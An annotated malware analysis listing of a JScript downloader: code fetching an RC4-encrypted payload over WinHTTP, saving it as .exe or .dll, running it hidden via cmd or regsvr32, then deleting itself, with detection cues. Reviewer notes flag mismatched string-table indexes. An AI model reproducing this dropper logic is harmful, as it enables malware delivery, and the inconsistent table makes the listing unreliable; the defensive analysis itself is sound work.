- hl = function(n, g) { // RC4 transform (decrypt and encrypt are the same operation): n = input string, g = key string; returns the output characters combined into one string
- for (var c = 0, d, b = [], h = [], a = 0; 256 > a; a++) b[a] = a; // state array b starts as the identity permutation 0..255; h collects output characters
- for (a = 0; 256 > a; a++) c = c + b[a] + g[v](a % g.length) & 255, d = b[a], b[a] = b[c], b[c] = d; // RC4 key scheduling: key char codes are mixed into b by swaps; v is a global assigned later in the script (annotated there as charCodeAt)
- for (var e = c = a = 0, s = String; e < n.length; e++) a = a + 1 & 255, c = c + b[a] & 255, d = b[a], b[a] = b[c], b[c] = d, h.push(s.fromCharCode(n[v](e) ^ b[b[a] + b[c] & 255])); // RC4 keystream loop: each input char code is XORed with the next keystream byte and pushed onto h
- return h[u(15)](u(11)) // method name and its argument both come from the u() string table; NOTE(review): presumably h.join(separator), but these indexes cannot be resolved from the table as pasted
- };
- var na = "WinHTTP Request.5.1 GET Scripting.FileSystemObject WScript.Shell ADODB.Stream Arguments .exe GetTempName charCodeAt iso-8859-1 indexOf .dll ScriptFullName join run /c /s "; // string table read by u(): COM ProgIDs, method names and command fragments are kept here rather than written as literals at the call sites; more text is appended to it inside the try block. NOTE(review): the table as pasted does not line up with every index annotation in the listing, so do not build signatures from this exact string
- function u(i) { // string-table lookup: returns entry i of na
- return na["Split"]("Z")[i] // NOTE(review): the delimiter and the capitalised method name used here do not match na as pasted, so the listing appears to have been hand-edited after capture; treat the index annotations elsewhere as the poster's notes, not verified values
- };
- function li(g) { // download-and-decrypt step: g is invoked as g(0), g(1), g(2); the caller passes the script's Arguments collection, so all three values come from the command line
- var k = o(u(0) /* WinHTTP */ + "." + u(0) + u(1)); // ProgID is assembled from table pieces instead of a literal; presumably the WinHTTP request object - confirm
- k.setProxy(n); // n is the global 0 assigned in the try block
- k.open(u(2), g(1), n); // u(2) = HTTP verb from the table (GET per the listing), g(1) = URL taken from argument 1, third argument 0 = synchronous request
- k.Option(0) = g(2); // JScript-only property-put syntax; WinHttpRequest option 0 is the User-Agent string, set from argument 2
- k.send();
- if (0310 == k.status) return hl(k["ResponseText"], g(n)) // 0310 is octal for 200; the body is passed through hl() with argument 0 as the key; any other status falls through and returns undefined
- };
- function o(a) { // thin wrapper: instantiates the COM object whose ProgID is a
- return new ActiveXObject(a) // ActiveXObject is provided by Windows Script Host / legacy IE only, so the script targets those hosts
- };
- try { // main routine: fetch and decrypt a payload, write it under a temp file name, launch it with a hidden window; any error lands in the empty catch below
- na += "e GetTempName charCodeAt iso-8859-1 indexOf .dll ScriptFullName join run /c /s "; // extends the string table at run time; NOTE(review): as pasted this repeats entries already present in na, so the table shown here is not reliable
- var q = o(u(3)), // Scripting.FileSystemObject (per the page's annotation); used for the temp name and the final DeleteFile
- m = WScript[u(6)], // Arguments: the script's command-line arguments, handed to li() below
- j = o(u(4)), // WScript.Shell: used for the launch call at the end of the try block
- s = o(u(5)), // ADODB.Stream: used to write the payload to disk
- p = u(7), // .exe
- n = 0, // shared 0: read by li() as proxy setting, async flag and key-argument index
- h1 = WScript[u(14)], // presumably ScriptFullName (this script's own path), given DeleteFile(h1) at the end - confirm
- v = u(9); // charCodeAt; hl() also reads v as a global
- s.Type = 2; // ADODB stream type 2 = text (adTypeText)
- c = q[u(8) /* GetTempName */](); // generated temporary file name, extension added below; c is an implicit global
- s.Charset = u(10); // iso-8859-1 per the table; presumably chosen so char codes 0-255 are written as single bytes
- s.Open();
- i = li(m); // decrypted response body; undefined when the HTTP status was not 200, in which case the next line throws into the catch
- d = i[v](i[u(12) /* indexOf */ ]("PE\x00\x00") + 23); // reads the byte 23 positions past the PE signature, i.e. the high byte of the COFF Characteristics field
- s["WriteText"](i);
- if (037 < d) { // 037 is octal for 31; a larger high byte means Characteristics bit 0x2000 (IMAGE_FILE_DLL) or a higher bit is set
- var z = 1; // flag: payload is treated as a DLL
- c += u(13) // presumably the ".dll" extension
- } else c += p; // otherwise the ".exe" extension
- s["SavetoFile"](c, 2); // option 2 = create or overwrite (adSaveCreateOverWrite)
- s.Close();
- z && (c = "regsvr32" + p + u(18) + c); // DLL case only: the path is wrapped in a regsvr32.exe command line; u(18) is presumably its silent switch
- j[u(16)/*join*/]("cmd" + p /* .exe */ + u(17) /* run */ + c, 0) // second argument 0 = hidden window. NOTE(review): the page's "join"/"run" annotations look shifted by one; the (command, 0) call shape matches WScript.Shell's Run and u(17) would then be a cmd.exe switch - unverified
- } catch (hy) {} // every failure is silently discarded, so a failed run leaves no error dialog
- q["DeleteFile"](h1); // runs outside the try: deletes the file named by h1 (self-deletion if h1 is the script path). Detection cues visible in this listing: a script host making a WinHTTP request, a new .exe/.dll under a temp name, and cmd.exe or regsvr32 spawned from the script host